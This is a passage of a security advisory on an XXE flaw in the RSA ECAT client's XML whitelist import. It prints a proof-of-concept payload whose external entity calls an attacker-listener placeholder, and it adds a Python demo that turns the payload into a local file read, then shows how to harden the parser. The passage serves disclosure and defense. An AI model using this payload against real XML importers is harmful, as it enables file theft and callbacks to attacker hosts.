||||
The RSA ECAT client allows users to import whitelisting files in XML format.
|
||||
By tricking the user to import an XML file with malicious XML code to the
|
||||
application, it's possible to exploit an XXE vulnerability within the application.
|
||||
|
||||
For example by importing the following XML code, arbitrary files can be read
|
||||
from the client's system. The following code generates the connection request
|
||||
from the client system to attacker system.
|
||||
|
||||
===============================================================================
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://[IP:port]/" >]><foo>&xxe;</foo>
===============================================================================

IP:port = IP address and port where the attacker is listening for connections

Furthermore, some files can be exfiltrated to remote servers via the
techniques described in:

https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf
http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf


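The following Python script is an added example, not part of the SEC Consult advisory and not RSA ECAT code. It reproduces both sides of this finding with the standard library's SAX parser: the advisory's PoC shape, with the SYSTEM identifier pointed at a constructed file:// URI instead of http://, leaks the file's contents when the parser is configured to resolve external general entities, and yields nothing once that feature is left off. It also shows the check an importer of untrusted XML should perform before parsing at all: refuse any document that carries a DOCTYPE. The secret file, the whitelist documents and the function names are constructed for the demonstration; the ECAT client's actual parser and import code are not shown on this page.

```python
"""XXE via an imported whitelist file, demonstrated with Python's xml.sax.

Added example, not code from the advisory or from RSA ECAT. The "secret" file,
the payload and the benign whitelist below are constructed inputs.
"""
import io
import tempfile
import xml.parsers.expat
import xml.sax
from pathlib import Path
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed stand-in for a sensitive file on the ECAT user's machine.
SECRET = "s3cret-token-1234"


class DtdRejected(ValueError):
    """Raised when an imported document declares a DOCTYPE (and so may define entities)."""


class _TextCollector(ContentHandler):
    """Collects the character data of the document; the PoC puts &xxe; inside <foo>."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def build_payload(target_uri: str) -> bytes:
    """The advisory's PoC, with the SYSTEM identifier pointing at target_uri.

    The original uses http://[IP:port]/ to make the client call back; a file://
    URI turns the same entity into a local file read.
    """
    return (
        '<?xml version="1.0" encoding="ISO-8859-1"?>\n'
        "<!DOCTYPE foo [\n"
        "<!ELEMENT foo ANY >\n"
        f'<!ENTITY xxe SYSTEM "{target_uri}" >]><foo>&xxe;</foo>\n'
    ).encode("latin-1")


def parse_whitelist(xml_bytes: bytes, resolve_external: bool) -> str:
    """Parse with xml.sax; resolve_external=True is the vulnerable configuration.

    Since Python 3.7.1 the SAX parser leaves feature_external_ges off, so a
    parser that switches it on (or an older one) behaves like the advisory describes.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)
    collector = _TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.parts)


def reject_dtd(xml_bytes: bytes) -> None:
    """Abort before any entity can be declared: a whitelist file needs no DOCTYPE."""
    expat = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdRejected(f"DOCTYPE '{name}' is not allowed in an imported whitelist")

    expat.StartDoctypeDeclHandler = on_doctype
    expat.Parse(xml_bytes, True)


def import_whitelist(xml_bytes: bytes) -> str:
    """Hardened import: no DOCTYPE accepted, external entities never resolved."""
    reject_dtd(xml_bytes)
    return parse_whitelist(xml_bytes, resolve_external=False)


def run_demo() -> dict:
    """Run the payload through the vulnerable and the hardened paths."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        secret_path = Path(tmp) / "secret.txt"
        secret_path.write_text(SECRET, encoding="ascii")
        payload = build_payload(secret_path.as_uri())

        # Vulnerable parser: the entity is fetched and its bytes land inside <foo>.
        results["vulnerable"] = parse_whitelist(payload, resolve_external=True)
        # Same parser with external entities off: the reference expands to nothing.
        results["entities_disabled"] = parse_whitelist(payload, resolve_external=False)
        # Hardened importer: the DOCTYPE alone is grounds for refusal.
        try:
            import_whitelist(payload)
            results["dtd_check"] = "accepted"
        except DtdRejected:
            results["dtd_check"] = "rejected"
        # A benign whitelist without a DTD still imports.
        results["benign"] = import_whitelist(b'<?xml version="1.0"?><foo>ok</foo>')
    return results


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name}: {value!r}")
```

The advisory does not name the XML stack the ECAT client uses, so the real fix is the same setting in whichever parser that is: in .NET, XmlReaderSettings.DtdProcessing = DtdProcessing.Prohibit (or a null XmlResolver); in Java, the disallow-doctype-decl feature or disabling external-general-entities and external-parameter-entities. The importer above is deliberately stricter than "do not resolve entities": a whitelisting file has no legitimate need for a DTD, so refusing the DOCTYPE also closes the parameter-entity exfiltration variants referenced above and entity-expansion DoS.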
Vulnerable / tested versions:
-----------------------------
The XXE vulnerability has been verified to exist in the RSA ECAT software
version 4.1.0.1 which was the latest version available at the time of
discovery.


Vendor contact timeline:
------------------------
2016-04-28: Vulnerabilities reported to the vendor by 3rd party
2016-06-23: Fixed by vendor in version 4.1.2 (ECAT-5972)
2016-10-11: SEC Consult releases security advisory


Solution:
---------
Update to version 4.1.2.0


Workaround:
-----------
None


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF S. Singh / @2016